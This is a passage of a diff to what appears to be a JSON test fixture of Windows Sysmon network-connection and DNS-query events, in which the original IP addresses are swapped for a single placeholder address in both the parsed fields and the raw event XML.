Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "3", "kind": "event" @@ -3616,10 +3616,10 @@ "SourceIsIpv6": "false", "DestinationIsIpv6": "false", "ProcessId": "4", - "DestinationIp": "169.254.255.255", + "DestinationIp": "89.160.20.156", "ProcessGuid": "{42f11c3b-6e19-5c8c-0000-0010eb030000}", "Initiated": "true", - "SourceIp": "169.254.180.25", + "SourceIp": "89.160.20.156", "SourcePort": "137", "SourcePortName": "netbios-ns", "DestinationPort": "137" @@ -3639,7 +3639,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e17\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.251\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e169.254.255.255\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e169.254.180.25\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e17\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.251\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "3" }, "winlog": { @@ -3661,8 +3661,8 @@ "ProcessId": "4", "Initiated": "false", "User": "NT AUTHORITY\\SYSTEM", - "SourceIp": "169.254.255.255", - "DestinationIp": "169.254.180.25", + "SourceIp": "89.160.20.156", + "DestinationIp": "89.160.20.156", "DestinationPort": "137", "Image": "System", "Protocol": "udp", @@ -3755,10 +3755,10 @@ "User": "NT AUTHORITY\\NETWORK SERVICE", "Initiated": "true", "DestinationIsIpv6": "true", - "DestinationIp": "e000:fc:0:0:0:0:0:0", + "DestinationIp": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "DestinationPortName": "llmnr", "ProcessGuid": "{42f11c3b-0bad-5c8c-0000-0010dfbc0000}", - "SourceIp": "a9fe:b419:0:0:f880:2301:e0:ffff", + "SourceIp": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "UtcTime": "2019-03-18 16:57:48.251", "ProcessId": "924", "Image": "C:\\Windows\\System32\\svchost.exe", @@ -3773,7 +3773,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e19\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.251\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003ea9fe:b419:0:0:f880:2301:e0:ffff\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e55717\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003ee000:fc:0:0:0:0:0:0\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e19\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.251\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e55717\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "3", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -3785,7 +3785,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e20\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.264\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e40.77.226.250\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e20\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.264\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "3", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -3817,7 +3817,7 @@ "Initiated": "true", "SourceIp": "10.0.2.15", "UtcTime": "2019-03-18 16:57:48.264", - "DestinationIp": "40.77.226.250", + "DestinationIp": "89.160.20.156", "DestinationIsIpv6": "false", "ProcessId": "4", "Protocol": "udp", @@ -3893,7 +3893,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:50.357238700Z'/\u003e\u003cEventRecordID\u003e22\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:49.213\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e169.254.255.255\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:50.357238700Z'/\u003e\u003cEventRecordID\u003e22\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:49.213\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "3", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -3909,7 +3909,7 @@ }, "event_data": { "DestinationIsIpv6": "false", - "DestinationIp": "169.254.255.255", + "DestinationIp": "89.160.20.156", "ProcessGuid": "{42f11c3b-6e19-5c8c-0000-0010eb030000}", "User": "NT AUTHORITY\\SYSTEM", "Initiated": "true", @@ -3944,7 +3944,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029861900Z'/\u003e\u003cEventRecordID\u003e128\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.890\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eapi-s2s.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:151.101.66.2;::ffff:151.101.130.2;::ffff:151.101.194.2;::ffff:151.101.2.2;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029861900Z'/\u003e\u003cEventRecordID\u003e128\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.890\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eapi-s2s.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -3967,7 +3967,7 @@ "ProcessId": "2736", "QueryName": "api-s2s.taboola.com", "QueryStatus": "0", - "QueryResults": "type: 5 f2.taboola.map.fastly.net;::ffff:151.101.66.2;::ffff:151.101.130.2;::ffff:151.101.194.2;::ffff:151.101.2.2;" + "QueryResults": "type: 5 f2.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;" }, "process": { "pid": 2828, @@ -3990,7 +3990,7 @@ "ProcessId": "2736", "QueryName": "x.bidswitch.net", "QueryStatus": "0", - "QueryResults": "::ffff:35.231.30.22;::ffff:35.196.212.198;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "process": { @@ -4019,13 +4019,13 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029870000Z'/\u003e\u003cEventRecordID\u003e129\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.892\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ex.bidswitch.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.231.30.22;::ffff:35.196.212.198;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029870000Z'/\u003e\u003cEventRecordID\u003e129\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.892\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData 